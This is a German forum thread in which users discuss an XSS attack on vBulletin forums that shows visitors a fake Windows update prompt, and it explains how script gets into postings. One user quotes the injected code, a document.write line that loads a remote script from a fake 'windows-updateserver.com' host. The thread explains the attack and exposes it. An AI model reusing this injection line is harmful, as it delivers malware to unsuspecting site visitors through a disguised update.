Bei Äpfeln und Pinguinen kommt halt nicht alles durchs "Fenster" geflogen ;)
Bei Äpfeln und Pinguinen kommt halt nicht alles durchs "Fenster" geflogen ;)
kann mir jmd als zufriedener windows nutzer erklären wie diese art angriff überhaupt funktioniert und keine sicherheitsmaßnahmen greifen?
Schwachstelle in der Forensoftware suchen, finden &nutzen-->javascript code einfüge-->Voila der Browser meldet Update
ah und wie wird der eingefügt?
was in den beitrag geschrieben oder während der beitrag an den server gesendet wird?
ich gehe davon aus, dass der schadcode, in das posting eingefügt wird.
Richtig. Ein Fehler(oder eine Fehlkonfiguration) in der Forensoftware sorgt dafür, dass man in den Postings ein
benutzen kann. Eine genauere Beschreibung des Exploit(inklusive "Mustecode") steht hierCode:{script} Hier Schadcode nach wahl {/script}
EDIT: Natürlich nehmen wir Spitze klammern für die Tags, aber selbst im "Code" Fenster werden die Scripte ausgeführt. Zumindest würde ich von Code erwarten, dass der Inhalt in jedem Fall plain durchgeht
achso...
ich dachte auch das die software sowas filtert....
naja...so schnell kanns gehen...kann man das aber nicht generell deaktivieren? das wird doch nicht wirklich gebraucht?
Dem Kerl scheint echt langweilig zu sein.... der registriert sich den ganzen Tag in sämtlichen v-Bulletin-Foren, klinkt sich in irgendwelche Beiträge ein und steckt jedes mal das gleiche Script rein... welches dann so aussieht:
XXXXXript language='JavaScript' type='text/javascript'>document.write("<" + "script language='JavaScript' type='text/javascript' src='http://windows-updateserver.com/signature/hKLYZ5joxmvAlyz147fYlWXU4mn5R3Pg?rand=" + Math.random() * 100000000 +"'>"+"script>")
Aktive Benutzer in diesem Thema: 1 (Registrierte Benutzer: 0, Gäste: 1)